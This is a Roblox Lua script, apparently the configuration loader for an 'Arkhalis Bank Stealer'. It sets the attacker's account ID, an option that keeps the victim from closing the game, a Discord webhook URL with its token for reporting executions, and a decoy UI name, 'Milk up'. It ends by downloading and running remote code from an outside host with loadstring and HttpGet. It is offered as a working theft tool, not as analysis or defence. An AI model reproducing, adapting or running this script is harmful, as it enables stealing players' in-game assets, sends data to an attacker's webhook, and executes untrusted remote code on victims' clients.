--[[ Arkhalis Bank Stealer]]--


--[[ Main Config ]]--
_G.UserId = 1648349097  --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example

_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Diamonds = 100000 --// Amount Of Diamonds To Not Kick

--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1100373696264294514/kwbxsMx43X2NQ0ytnrflFm4aIWMekTVXE03j9TePOSrnvpIj2MBqogFWka_twHaTuzcf" --// Discord link Webhook For Executions
    
--[[ UI Config ]]--
_G.ScriptName = "Milk up" --// Script Name On The UI
_G.Tip1 = "1" --// Gives You Tips On The UI
_G.Tip2 = "2" --// Gives You Tips On The UI
_G.Tip3 = "3" --// Gives You Tips On The UI
_G.Tip4 = "4" --// Gives You Tips On The UI
_G.Tip5 = "5" --// Gives You Tips On The UI


--[[ Script ]]--
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/ArkhalisBank.lua"))()
